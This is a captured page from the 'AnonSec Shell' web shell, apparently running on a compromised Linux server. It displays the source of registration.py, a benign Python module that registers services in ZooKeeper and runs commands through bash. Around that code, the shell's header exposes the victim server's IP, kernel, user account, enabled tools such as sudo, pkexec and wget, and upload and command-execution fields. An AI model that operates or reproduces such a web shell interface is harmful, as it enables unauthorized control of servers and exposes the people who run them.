AnonSec Shell
Server IP : 92.204.138.22  /  Your IP : 18.119.172.85
Web Server : Apache
System : Linux ns1009439.ip-92-204-138.us 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64
User : internationaljou ( 1019)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/var/opt/nydus/ops/primordial/service/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /proc/self/root/var/opt/nydus/ops/primordial/service/registration.py
# -*- coding: utf-8 -*-

from argparse import ArgumentParser
from collections import defaultdict
from datetime import datetime
from functools import partial
import json
import logging
import os
import os.path
import platform
import shlex
import signal
import socket
import subprocess
from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Union  # pylint: disable=W0611
from uuid import uuid1

from kazoo.client import KazooClient, KazooState

from primordial.constants import CANONICAL_TIMESTRING_FORMAT
from primordial.flow import retry, RetryError
from primordial.settings import (ZK_HOSTS, GD_ZKRUN_VIRTUALENV_PATH, GD_ZKRUN_COMMAND, GD_ZKRUN_NAME, GD_ZKRUN_HOSTS,
                                 GD_ZKRUN_SERVICE_TYPE, GD_ZKRUN_PORT, GD_ZKRUN_SSL_PORT, GD_ZKRUN_LOCATIONS)


# Per-signal delivery counters keyed by signal number; default_signal_handler increments them.
SIGNALS = defaultdict(int)  # type: Dict[int, int]
# Maps the pid of a child started by zk_start to a "keep running" flag: zk_start sets it to
# True after launching the child and its signal handler flips it to False.
ZKSTART_STATUS = {}  # type: Dict[int, bool]
# Module-level logger named after this module.
LOGGER = logging.getLogger(__name__)


def get_zkhosts():
    """Return the zookeeper hosts configured in the default settings (``ZK_HOSTS``)."""
    configured_hosts = ZK_HOSTS
    return configured_hosts


# Accepted shapes for the ``locations`` setting: None, a single string, or an iterable of strings.
LocationsType = Optional[Union[str, Iterable[str]]]


class ZkRegistrar:
    """Implementation of a basic Zookeeper ephemeral node registrar.

    The registrar owns a KazooClient and publishes one ephemeral node at
    ``/service/<service_type>/<name>/<uuid>`` whose payload is a JSON document
    describing this host.  Two flags track connection state:

    * ``connection_was_lost`` -- set when the default state handler sees ``KazooState.LOST``.
    * ``need_to_register`` -- True when :meth:`register` should be (re)called; callers poll it.
    """
    locations = None  # type: LocationsType

    def __init__(self,
                 listener: Optional[Callable] = None,
                 name: Optional[str] = None,
                 zkhosts: Optional[str] = None,
                 service_type: str = "registrations",
                 port: Optional[int] = None,
                 ssl_port: Optional[int] = None,
                 locations: LocationsType = None) -> None:
        """Create a zookeeper client and hang on to the listener.

        :param listener:  The zookeeper listener action; is activated by the kazoo client when updates occur to watched
                          zookeeper parameters.  Defaults to :meth:`default_zk_state_handler`.
        :param name: The path base for this service.
        :param zkhosts: The zkhost or hosts (list/tuple, joined with commas) to use with the zk client; if none set,
                        get_zkhosts() supplies the value from the default settings.
        :param service_type: verticals for REST interfaces and registrations for Kafka listeners, pollers, etc.
        :param port: port the service is listening on if any
        :param ssl_port: ssl port if any
        :param locations: URLs that correspond to this server if any
        """
        if zkhosts is None:
            zkhosts = get_zkhosts()
        if isinstance(zkhosts, (list, tuple)):
            # KazooClient is given a single comma-separated host string.
            zkhosts = ",".join(zkhosts)
        self.listener = listener or self.default_zk_state_handler
        self.name = name
        self.zk = KazooClient(hosts=zkhosts)
        # Unique per registrar instance; used as the leaf node name and as the 'id' payload field.
        self.zk_uuid = str(uuid1())
        self.service_type = service_type
        self.port = port
        self.ssl_port = ssl_port
        self.locations = locations
        self.connection_was_lost = False
        self.need_to_register = True

    def default_zk_state_handler(self, state: str) -> None:
        """Track LOST -> CONNECTED transitions so the caller knows when to re-register.

        :param state: The new connection state reported by the kazoo client.
        """
        LOGGER.debug('Zookeeper state change: %s (%s)', state, self.zk.client_state)
        # The state transition we need to handle is LOST->CONNECTED, in which
        # case we need to re-register the service in ZooKeeper.
        if state == KazooState.LOST:
            self.connection_was_lost = True
            self.need_to_register = False
        elif state == KazooState.CONNECTED and self.connection_was_lost:
            self.connection_was_lost = False
            self.need_to_register = True

    def register(self) -> None:
        """Attach the listener, start the client and create the ephemeral registration node.

        The node payload is UTF-8 encoded JSON containing the host name, this registrar's
        uuid, the service name, the locations list, a UTC registration timestamp and, when
        configured, the port / sslPort.  Clears ``need_to_register`` on success.
        """
        self.zk.add_listener(self.listener)
        self.zk.start()
        # Normalise locations: None -> empty list, a bare value -> one-element list.
        if self.locations is None:
            locations = []  # type: Iterable[str]
        elif not isinstance(self.locations, (list, tuple)):
            locations = [self.locations]  # type: ignore
        else:
            locations = self.locations
        zk_register_data = {
            'address': platform.node(),
            'id': self.zk_uuid,
            'name': self.name,
            'locations': locations,
            'registrationTimeUTC': datetime.utcnow().strftime(CANONICAL_TIMESTRING_FORMAT),  # pylint: disable=E1120
            'serviceType': 'DYNAMIC'
        }  # type: Dict[str, Any]
        if self.port is not None:
            zk_register_data['port'] = self.port
        if self.ssl_port is not None:
            zk_register_data['sslPort'] = self.ssl_port
        self.zk.ensure_path('/service/%s/%s' % (self.service_type, self.name))
        self.zk.create('/service/%s/%s/%s' % (self.service_type, self.name, self.zk_uuid),
                       json.dumps(zk_register_data).encode('utf-8'), ephemeral=True)
        self.need_to_register = False

    def unregister(self) -> None:
        """Delete the registration node, detach the listener and stop the client.

        Any exception raised by the delete still propagates to the caller, but the
        listener is removed and the client is stopped regardless, so a failed delete
        does not leave the zookeeper client running.
        """
        try:
            self.zk.delete('/service/%s/%s/%s' % (self.service_type, self.name, self.zk_uuid))
        finally:
            self.zk.remove_listener(self.listener)
            self.zk.stop()


def shell_run(command: str) -> subprocess.Popen:
    """Launch ``command`` in a ``/bin/bash -c`` subshell and return the process handle.

    Linux only.  The working directory of neither the shell nor the parent
    process is changed, so whatever is run must be reachable via PATH (or via
    a virtualenv entered as part of the command itself).

    :param command:  The text handed verbatim to bash as a single ``-c`` input.
        No processing is done on the string, e.g. no string substitutions and
        no interpolations; shell metacharacters and expansions ** will ** be
        processed as per standard shell semantics, and the caller is fully
        responsible for all related security concerns.  E.g.

        .. code-block:: python

            uwsgi_exe = ("source %(virtualenv)s/bin/activate && "
                        "cd %(virtualenv)s/.. && "
                        "uwsgi --master --lazy-apps --processes 5 "
                        "--die-on-term --module wsgi:application --http :80"
                        % {'virtualenv': vpath})

    :returns:  The structure returned by subprocess.Popen:
               https://docs.python.org/3/library/subprocess.html#subprocess.Popen

    """
    bash_argv = ["/bin/bash", "-c", command]
    # The Popen object is returned to the caller, who manages the process from here on.
    return subprocess.Popen(bash_argv)  # pylint: disable=consider-using-with


def enter_virtualenv_and_run(virtualenv_path: str, command: str) -> subprocess.Popen:
    """Enter a virtual environment and run a command.

    Simplifies a common python use case of entering a virtualenv and running a
    local shell command.  NB: this does NOT change the current working directory
    of the shell or the parent process; any command you run will have to
    be on the PATH or part of the entered virtualenv.

    :param virtualenv_path: A string representing the path to a virtualenv.  It is resolved to
        an absolute path and shell-quoted before use, so paths containing spaces or shell
        metacharacters are handled.
    :param command:  As per shell_run; passed through to the shell unmodified.
    :returns:  The structure returned by subprocess.Popen:
               https://docs.python.org/3/library/subprocess.html#subprocess.Popen
    :raises ValueError: if the virtualenv path appears to be in error.
    """
    vpath = os.path.abspath(virtualenv_path)
    activate_script = os.path.join(vpath, 'bin', 'activate')
    if not os.path.exists(activate_script):
        raise ValueError('Specified path (%s) does not look like a python virtualenv!' % virtualenv_path)

    # Source exactly the file that was just validated, quoted so the shell treats it as one
    # word.  Only the path is quoted: the command must keep its shell semantics.
    venv_command = "source %s && %s" % (shlex.quote(activate_script), command)

    return shell_run(venv_command)


def bind_signal_handlers(signals: List[int], signal_handler_func: Callable) -> None:
    """Install a single handler for every signal number in a list.

    :param signals: The signal numbers to bind; an empty list binds nothing
    :param signal_handler_func: The callable installed via signal.signal for each of them
    :raises ValueError: on invalid signal number
    """
    install = signal.signal
    for signum in signals:
        install(signum, signal_handler_func)


def default_signal_handler(signum: int, _) -> None:
    """Record one more delivery of a signal in the module-level SIGNALS counter.

    :param signum: The number of the signal that was delivered
    """
    SIGNALS[signum] = SIGNALS[signum] + 1


def set_default_signals() -> None:
    """Route SIGINT and SIGTERM to the counting default_signal_handler."""
    counted_signals = [signal.SIGINT, signal.SIGTERM]
    bind_signal_handlers(counted_signals, default_signal_handler)


def wait_for_process(pid: int, sleep_secs: float, max_attempts: int) -> Tuple[Optional[int], Optional[int]]:
    """Wait for a process to finish running.

    Polls the child with a non-blocking ``os.waitpid`` through the ``retry`` helper.

    :param pid: The process ID on which to wait
    :param sleep_secs: The number of seconds to sleep between checks (passed to ``retry``)
    :param max_attempts: The number of times to attempt checking on the pid (passed to ``retry``)
    :returns: The ``(pid, status)`` pair reported by ``os.waitpid`` once the process has
        finished, or ``(None, None)`` when ``retry`` gives up with a RetryError.  The status
        is the raw value from ``os.waitpid``, not a decoded exit code.
    """

    def wait_for_pid(mypid):
        # WNOHANG: return immediately; a pid of 0 means the child has not changed state yet.
        w_process_id, w_exit_status = os.waitpid(mypid, os.WNOHANG)
        if w_process_id == 0:
            # Raise so that retry treats this attempt as unsuccessful.
            # NOTE(review): presumably retry re-invokes on any Exception -- confirm in primordial.flow.
            raise Exception("Not done yet")
        return w_process_id, w_exit_status

    try:
        process_id, exit_status = retry(partial(wait_for_pid, pid), sleep_secs=sleep_secs, max_attempts=max_attempts)
    except RetryError:
        # Still running after the retry budget; callers test for None to keep waiting.
        process_id, exit_status = None, None
    return process_id, exit_status


def check_tcp_port(port: int) -> bool:
    """Check to see if a local port is accepting TCP connections.

    Attempts a TCP connect to the empty host string on ``port`` with a one second timeout.

    :param port: The port number to be checked.
    :returns: True if the connection was established; False if it timed out, was refused
        or failed with any other OSError.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) as sock:
        sock.settimeout(1)
        try:
            sock.connect(('', port))
        except OSError:
            # Covers socket.timeout as well as ConnectionRefusedError: a port that is not
            # listening is an expected answer here, not an error.
            return False
        try:
            sock.shutdown(socket.SHUT_RDWR)
        except OSError:
            # The connect already succeeded, so the port is accepting; a failed polite
            # shutdown (e.g. peer already gone) does not change the answer.
            pass
    return True


def zk_start(args: Optional[List[str]] = None) -> ZkRegistrar:
    """Start a process wrapped in a watcher and register with zookeeper.

    Steps:

        1.  Get the ephemeral registration data from command-line arguments or environment variables
        2.  Get the command to run from command-line arguments or environment variables
        3.  Run the command.
        4.  Register with zookeeper.
        5.  Wait for the command to complete (or for SIGINT/SIGTERM), re-registering whenever the
            registrar reports that it needs to.
        6.  De-register with zookeeper.

    Command-line arguments:

        * --virtualenv-path
        * --command
        * --name
        * --zkhosts
        * --service_type (verticals, registrations)
        * --port
        * --ssl-port
        * --locations

    Environment variables (from settings.py):

        * GD_ZKRUN_VIRTUALENV_PATH
        * GD_ZKRUN_COMMAND
        * GD_ZKRUN_NAME
        * ZK_HOSTS
        * GD_ZKRUN_HOSTS
        * GD_ZKRUN_SERVICE_TYPE
        * GD_ZKRUN_PORT
        * GD_ZKRUN_SSL_PORT
        * GD_ZKRUN_LOCATIONS

    Methodology:

        * Command-line arguments override environment variables.
        * The command, name and service type are mandatory, but each may come from either
          source; if one is missing from both, the argument parser reports a usage error.

    :param args: Argument list to parse; None lets argparse read the process arguments.
    :returns: The registrar that was used (already unregistered); handy for testing.

    NOTE(review): the signal handler only ends the wait loop; nothing in this function
    terminates the child process.
    """
    parser = ArgumentParser(description="Start a process with a zookeeper registration")
    parser.add_argument('--virtualenv-path', help="Path to a python venv")
    # --command, --name and --service_type are deliberately not marked required in argparse:
    # that would reject the invocation before the settings fallbacks below could apply.
    parser.add_argument('--command', help="Shell command to run, properly escaped")
    parser.add_argument('--name', help="Service name (zk base node)")
    parser.add_argument('--zkhosts', action='append', help="Zookeeper hosts")
    parser.add_argument('--service_type', help="Service type, registrations or verticals")
    parser.add_argument('--port', type=int, help="Port of service if any")
    parser.add_argument('--ssl-port', type=int, help="Ssl port of service if any")
    parser.add_argument('--locations', action='append', help="Urls for MCP use if any")
    res = parser.parse_args(args=args)

    # Command line first, then settings; empty values collapse to None.
    virtualenv_path = res.virtualenv_path or GD_ZKRUN_VIRTUALENV_PATH or None
    command = res.command or GD_ZKRUN_COMMAND or None
    name = res.name or GD_ZKRUN_NAME or None
    zkhosts = res.zkhosts or GD_ZKRUN_HOSTS or ZK_HOSTS or None
    service_type = res.service_type or GD_ZKRUN_SERVICE_TYPE or None
    port = res.port or GD_ZKRUN_PORT or None
    ssl_port = res.ssl_port or GD_ZKRUN_SSL_PORT or None
    locations = res.locations or GD_ZKRUN_LOCATIONS or None

    required_settings = (('--command', 'GD_ZKRUN_COMMAND', command),
                         ('--name', 'GD_ZKRUN_NAME', name),
                         ('--service_type', 'GD_ZKRUN_SERVICE_TYPE', service_type))
    missing = ['%s (or %s)' % (flag, env_name) for flag, env_name, value in required_settings if value is None]
    if missing:
        # parser.error prints usage and exits with status 2, as argparse does for required arguments.
        parser.error('the following settings are required: %s' % ', '.join(missing))

    if virtualenv_path is not None:
        LOGGER.info("Running venv run %s { %s } { %s }", enter_virtualenv_and_run, virtualenv_path, command)
        pid = enter_virtualenv_and_run(virtualenv_path, command).pid  # type: ignore
    else:
        LOGGER.info("Running shell run %s { %s }", shell_run, command)
        pid = shell_run(command).pid  # type: ignore
    LOGGER.info("Started process %s", pid)
    ZKSTART_STATUS[pid] = True

    def zkstart_signal_handler(_signum, _frame, runpid=None):
        # Only flips the flag; the wait loop below notices it on its next pass.
        LOGGER.info("Signal handler called with %s, %s", _signum, _frame)
        ZKSTART_STATUS[runpid] = False

    bind_signal_handlers([signal.SIGINT, signal.SIGTERM], partial(zkstart_signal_handler, runpid=pid))

    registrar = ZkRegistrar(name=name, zkhosts=zkhosts, service_type=service_type, port=port,  # type: ignore
                            ssl_port=ssl_port, locations=locations)  # type: ignore
    registrar.register()
    while ZKSTART_STATUS[pid] is True:
        # The registrar's state handler sets this again after a LOST -> CONNECTED transition.
        if registrar.need_to_register is True:
            registrar.register()
        # Poll the child: 3 attempts, 5 seconds apart; None means it is still running.
        process_id, exit_status = wait_for_process(pid, 5, 3)
        if process_id is not None:
            LOGGER.info('Process %s exited with status %s', pid, exit_status)
            break
    LOGGER.info("Clean shutdown of %s", pid)
    registrar.unregister()
    return registrar  # this is harmless, and handy for testing

Anon7 - 2022
AnonSec Team